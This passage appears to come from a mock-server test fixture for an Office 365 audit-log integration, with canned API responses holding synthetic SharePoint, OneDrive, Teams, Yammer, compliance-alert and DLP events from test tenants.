"2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": 
"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}, - {"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}, - {"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 
Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0} - ] - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "Audit.General" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "Audit.General", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/gen1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/gen1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: "[\n 
{\"ObjectId\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"CreationTime\":\"2020-02-28T09:42:45\",\"UserKey\":\"100320009d6edf94\",\"YammerNetworkId\":5846122497,\"Operation\":\"GroupCreation\",\"ClientIP\":\"79.159.10.151:12345\",\"ActorYammerUserId\":36787265537,\"UserType\":0,\"ResultStatus\":\"TRUE\",\"RecordType\":22,\"Workload\":\"Yammer\",\"Version\":1,\"GroupName\":\"Sales\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\"},\n {\"CreationTime\":\"2020-02-28T09:39:20\",\"ActorUserId\":\"asr@testsiem2.onmicrosoft.com\",\"ObjectId\":\"Company group\",\"UserKey\":\"100320009d292e16\",\"Id\":\"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06\",\"ActorYammerUserId\":36085768193,\"ClientIP\":\"[fdfd::555]:12346\",\"UserId\":\"asr@testsiem2.onmicrosoft.com\",\"Operation\":\"GroupCreation\",\"ResultStatus\":\"TRUE\",\"UserType\":0,\"Workload\":\"Yammer\",\"Version\":1,\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"YammerNetworkId\":5846122497,\"RecordType\":22,\"GroupName\":\"Company group\"},\n {\"RecordType\":25,\"Version\":1,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"UserId\":\"Application\",\"UserKey\":\"\",\"CreationTime\":\"2020-02-17T16:59:44\",\"TeamName\":\"SIEMTest\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Operation\":\"TeamCreated\",\"Id\":\"49fa9883-50a9-4c9c-8e12-57e0948a9d8a\",\"UserType\":5,\"Workload\":\"MicrosoftTeams\"},\n 
{\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"TeamName\":\"SIEMTest\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Operation\":\"MemberAdded\",\"Workload\":\"MicrosoftTeams\",\"RecordType\":25,\"Version\":1,\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"CreationTime\":\"2020-02-17T16:59:47\",\"ItemName\":\"SIEMTest\",\"Id\":\"3a951c24-3214-5529-b2fe-097628a39ecd\",\"UserType\":0,\"Members\":[{\"Role\":1,\"UPN\":\"david@testsiem.onmicrosoft.com\",\"DisplayName\":\"David\"},{\"Role\":1,\"UPN\":\"chuck@testsiem.onmicrosoft.com\",\"DisplayName\":\"Chuck\"},{\"Role\":1,\"UPN\":\"bob@testsiem.onmicrosoft.com\",\"DisplayName\":\"Bob\"},{\"Role\":1,\"UPN\":\"alice@testsiem.onmicrosoft.com\",\"DisplayName\":\"Alice\"}]},\n {\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"TeamName\":\"SIEMTest\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Operation\":\"MemberAdded\",\"Workload\":\"MicrosoftTeams\",\"RecordType\":25,\"Version\":1,\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"CreationTime\":\"2020-02-17T16:59:44\",\"ItemName\":\"SIEMTest\",\"Id\":\"3350cfd2-1020-5b11-99d8-2701f3a29ea3\",\"UserType\":0,\"Members\":[{\"Role\":2,\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"DisplayName\":\"Alan Smithee\"}]},\n {\"RecordType\":25,\"Version\":1,\"ObjectId\":\"Unknown (Unknown)\",\"UserId\":\"bob@testsiem.onmicrosoft.com\",\"UserKey\":\"d0e0cfb0-284d-4b0a-83fe-dd543a1c1ed0\",\"CreationTime\":\"2020-02-17T16:59:34\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Id\":\"d7636db2-859f-437e-8dff-573726578ad7\",\"Operation\":\"TeamsSessionStarted\",\"UserType\":0,\"Workload\":\"MicrosoftTeams\"},\n {\"Category\": \"AccessGovernance\", \"UserKey\": \"SecurityComplianceAlerts\", \"Operation\": \"AlertEntityGenerated\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"AlertEntityId\" 
: \"asr@testsiem.onmicrosoft.com\", \"Source\" : \"Office 365 Security & Compliance\", \"Name\" : \"Elevation of Exchange admin privilege\", \"AlertType\" : \"System\", \"RecordType\" : 40, \"Version\" : 1, \"Status\" : \"Active\", \"ObjectId\" : \"asr@testsiem.onmicrosoft.com\", \"ResultStatus\" : \"Succeeded\", \"Comments\" : \"New alert\", \"AlertLinks\" : [ { \"AlertLinkHref\" : \"http://example.net/alert\" }, { \"AlertLinkHref\" : \"http://example.net/info\" } ], \"Severity\" : \"Low\", \"Data\" : \"{\\\"etype\\\":\\\"User\\\",\\\"eid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"ts\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"tdc\\\":\\\"1\\\",\\\"suid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ut\\\":\\\"Admin\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\"}\", \"Workload\" : \"SecurityComplianceCenter\", \"EntityType\" : \"User\", \"AlertId\" : \"5ba6e029-8b6e-13bd-b800-08d7b180173c\", \"UserId\" : \"SecurityComplianceAlerts\", \"CreationTime\" : \"2020-02-14T19:00:00\", \"Id\" : \"448854d7-81f6-4a06-d31a-08d7b1c1fb2f\", \"UserType\" : 4, \"PolicyId\" : \"17d51759-88e1-40c1-8df3-20bcf2e43057\" },\n { \"Status\" : \"Active\", \"Category\" : \"AccessGovernance\", \"ResultStatus\" : \"Succeeded\", \"ObjectId\" : \"5ba6e029-8b6e-13bd-b800-08d7b180173c\", \"Comments\" : \"New alert\", \"UserKey\" : \"SecurityComplianceAlerts\", \"AlertLinks\" : [ { \"AlertLinkHref\" : \"http://example.net/single\" } ], \"Data\" : 
\"{\\\"f3u\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ts\\\":\\\"2020-02-14T18:45:00.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T19:00:00.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"wl\\\":\\\"Exchange\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"23a5e271-e297-4f35-ff57-08d7b17f5bf2\\\",\\\"rid\\\":\\\"f81f1b69-dc60-4ded-918e-e17d5c73b29f\\\",\\\"cid\\\":\\\"17d51759-88e1-40c1-8df3-20bcf2e43057\\\",\\\"ad\\\":\\\"This alert is triggered when someone in your organization becomes an Exchange admin or gets new Exchange admin permissions -V1.0.0.1\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\",\\\"an\\\":\\\"Elevation of Exchange admin privilege\\\",\\\"sev\\\":\\\"Low\\\"}\", \"Severity\" : \"Low\", \"Operation\" : \"AlertTriggered\", \"OrganizationId\" : \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"Source\" : \"Office 365 Security & Compliance\", \"Workload\" : \"SecurityComplianceCenter\", \"Name\" : \"Elevation of Exchange admin privilege\", \"AlertType\" : \"System\", \"AlertId\" : \"5ba6e029-8b6e-13bd-b800-08d7b180173c\", \"RecordType\" : 40, \"Version\" : 1, \"UserId\" : \"SecurityComplianceAlerts\", \"CreationTime\" : \"2020-02-14T19:00:00\", \"Id\" : \"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\", \"UserType\" : 4, \"PolicyId\" : \"17d51759-88e1-40c1-8df3-20bcf2e43057\" },\n { \"Status\" : \"Active\", \"Category\" : \"ThreatManagement\", \"ResultStatus\" : \"Succeeded\", \"ObjectId\" : \"12345678-8b6e-13bd-b800-08d7b180173c\", \"Comments\" : \"This is a phony threat alert\", \"UserKey\" : \"SecurityComplianceAlerts\", \"AlertLinks\" : [], \"Data\" : \"{\\\"something\\\":\\\"blabla\\\"}\", \"Severity\" : \"High\", \"Operation\" : \"AlertTriggered\", \"OrganizationId\" : \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"Source\" : \"Office 365 Security & Compliance\", \"Workload\" : \"SecurityComplianceCenter\", \"Name\" : \"Phony Malware Alert\", \"AlertType\" : \"System\", \"AlertId\" : 
\"1233344-8b6e-13bd-b800-08d7b180173c\", \"RecordType\" : 40, \"Version\" : 1, \"UserId\" : \"SecurityComplianceAlerts\", \"CreationTime\" : \"2020-02-14T19:00:00\", \"Id\" : \"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\", \"UserType\" : 4, \"PolicyId\" : \"17d51759-88e1-40c1-8df3-20bcf2e43057\", \"AlertEntityId\" : \"Malware/Evil.Malware.B\", \"EntityType\" : \"MalwareFamily\"}, \n {\"Workload\": \"SecurityComplianceCenter\", \"DataType\": \"DataInsightsSubscription\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-10T15:13:38\", \"UserId\": \"Service Account\", \"UserType\": 5, \"Version\": 1, \"UserKey\": \"Service Account\", \"Operation\": \"SearchDataInsightsSubscription\", \"Id\": \"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\", \"RecordType\": 52},\n {\"Workload\": \"SecurityComplianceCenter\", \"DataType\": \"DataInsightsSubscription\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-12T21:38:38\", \"UserId\": \"Service Account\", \"UserType\": 5, \"Version\": 1, \"UserKey\": \"Service Account\", \"Operation\": \"SearchDataInsightsSubscription\", \"Id\": \"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\", \"RecordType\": 52},\n {\"Workload\": \"SecurityComplianceCenter\", \"RecordType\": 52, \"DataType\": \"DataInsightsSubscription\", \"CreationTime\": \"2020-02-10T15:13:38\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"UserId\": \"Service Account\", \"UserType\": 5, \"Version\": 1, \"UserKey\": \"Service Account\", \"Operation\": \"SearchDataInsightsSubscription\", \"Id\": \"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\"},\n {\"ClientIP\":\"[10.11.12.13]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"10.11.12.13:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n 
{\"ClientIP\":\"10.11.12.13\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"::ffff:10.11.12.13\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[::ffff:10.11.12.13]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[2001:db8::abcd]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"2001:db8::abcd\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[2001:db8::abcd]\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[10.11.12.13]\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"localhost\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[localhost]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"localhost:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"[cool.client.local]:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"cool.client.local\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"},\n {\"ClientIP\":\"cool.client.local:12345\",\"RecordType\":-1,\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\"}\n]" - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] 
- query_params: - contentType: "DLP.All" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "DLP.All", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/dlp1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/dlp1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - {"Workload": "OneDrive", "SensitiveInfoDetectionIsIncluded": false, "ObjectId": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-25T16:20:15", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "Low", "RuleId": "c5981414-9f1f-4275-a2df-2fbfb1d03795", "ConditionsMatched": {"SensitiveInformation": [{"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["NotifyUser"], "RuleName": "Low volume of content detected U.S. Financial", "ActionParameters": [], "RuleMode": "Enable"}], "PolicyName": "U.S. 
Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx", "ItemLastModifiedTime": "2020-02-25T16:19:43", "ItemCreationTime": "2020-02-25T15:22:49", "FileName": "Customers Financial Data.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "FileOwner": "Alan Smithee", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "3066c3c5-eb56-dd03-b000-08d7ba115afd", "Id": "a21f13b9-22b6-405b-bf9e-a07ad8d456da", "RecordType": 11}, - {"Workload": "OneDrive", "SensitiveInfoDetectionIsIncluded": false, "ObjectId": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-25T16:23:39", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "7503b92a-67c2-494b-8a46-57ef0d738886", "ConditionsMatched": {"SensitiveInformation": [{"Count": 12, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["BlockAccess", "NotifyUser", "GenerateIncidentReport"], "RuleName": "High volume of content detected U.S. Financial", "ActionParameters": ["GenerateIncidentReport:SiteAdmin"], "RuleMode": "Enable"}], "PolicyName": "U.S. 
Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx", "ItemLastModifiedTime": "2020-02-25T16:21:44", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com", "ItemCreationTime": "2020-02-25T16:21:50", "FileName": "Customers Financial Data Copy.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "FileOwner": "Alan Smithee"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "eeeb7b44-fc69-c19f-b000-08d7ba115afd", "Id": "eb8259c8-d2c2-449d-bd35-5c8a033eb629", "RecordType": 11}, - {"Workload": "OneDrive", "RecordType": 11, "ObjectId": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-25T16:23:39", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "Low", "RuleId": "c5981414-9f1f-4275-a2df-2fbfb1d03795", "ConditionsMatched": {"SensitiveInformation": [{"Count": 12, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["NotifyUser"], "RuleName": "Low volume of content detected U.S. Financial", "ActionParameters": [], "RuleMode": "Enable"}], "PolicyName": "U.S. 
Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx", "ItemLastModifiedTime": "2020-02-25T16:21:44", "ItemCreationTime": "2020-02-25T16:21:50", "FileName": "Customers Financial Data Copy.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "856386d5-c9cd-46e9-b53b-fd01ed590b68", "FileOwner": "Alan Smithee", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "eeeb7b44-fc69-c19f-b000-08d7ba115afd", "Id": "50a90c83-7e15-4679-8778-d9dd30927e66", "SensitiveInfoDetectionIsIncluded": false}, - {"Workload": "OneDrive", "RecordType": 11, "ObjectId": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "CreationTime": "2020-02-25T16:22:22", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "7503b92a-67c2-494b-8a46-57ef0d738886", "ConditionsMatched": {"SensitiveInformation": [{"Count": 12, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 1, "Confidence": 75, "SensitiveType": "cb353f78-2b72-4c3c-8827-92ebe4f69fdf"}]}, "Actions": ["BlockAccess", "NotifyUser", "GenerateIncidentReport"], "RuleName": "High volume of content detected U.S. Financial", "ActionParameters": ["GenerateIncidentReport:SiteAdmin"], "RuleMode": "Enable"}], "PolicyName": "U.S. 
Financial Data", "PolicyId": "a15b4790-085f-43c1-90ad-853b16cedeec"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx", "ItemLastModifiedTime": "2020-02-25T16:21:44", "ItemCreationTime": "2020-02-25T15:22:49", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "9cc7be1c-dd5a-4895-b7cb-757de6d51b42", "FileOwner": "Alan Smithee", "FileName": "Customers Financial Data.docx"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "3066c3c5-eb56-dd03-b000-08d7ba115afd", "Id": "59652f9a-087c-4b65-b88c-b293ade34202", "SensitiveInfoDetectionIsIncluded": false}, - {"Workload": "OneDrive", "RecordType": 11, "ObjectId": "f026407b-090a-4c15-99b5-09851842d96d", "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "CreationTime": "2020-02-26T10:13:48", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "bc4d376f-b038-4695-9362-609d32f963cf", "ConditionsMatched": {"SensitiveInformation": [{"Count": 42, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 23, "Confidence": 85, "SensitiveType": "0e9b3178-9678-47dd-a509-37222ca96b42"}]}, "Actions": ["BlockAccess", "NotifyUser", "GenerateIncidentReport"], "RuleName": "High volume of content detected France Financial", "ActionParameters": ["GenerateIncidentReport:SiteAdmin"], "RuleMode": "Enable"}], "PolicyName": "Financial Data Detection", "PolicyId": "08745d02-5d45-48bd-98e1-8199ab1efdbe"}], "SharePointMetaData": {"From": "ASR@TESTSIEM2.ONMICROSOFT.COM", "FilePathUrl": 
"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/INTERNAL%20CREDIT%20CARD%20NUMBERS.docx", "ItemLastModifiedTime": "2020-02-26T09:46:23", "SiteCollectionUrl": "https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com", "ItemCreationTime": "2020-02-26T09:44:40", "FileName": "INTERNAL CREDIT CARD NUMBERS.docx", "SiteCollectionGuid": "eae3edad-a192-43a9-b317-98d7ea5e3939", "UniqueID": "f026407b-090a-4c15-99b5-09851842d96d", "FileOwner": "Alan Smithee"}, "UserKey": "DlpPolicyEventBasedAssistantOneDriveForBusiness", "Operation": "DLPRuleMatch", "IncidentId": "f7295114-e601-f2b6-8800-08d7baa56f8b", "Id": "d69c6758-f210-43bd-bac1-563adef4b4cf", "SensitiveInfoDetectionIsIncluded": false}, - {"Workload": "SharePoint", "SensitiveInfoDetectionIsIncluded": false, "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DLPAgent", "CreationTime": "2020-02-26T12:39:40", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd", "RuleName": "Low volume of content detected France Financial", "Actions": ["NotifyUser", "GenerateAlert"], "ConditionsMatched": {"SensitiveInformation": [{"Count": 42, "Confidence": 85, "SensitiveType": 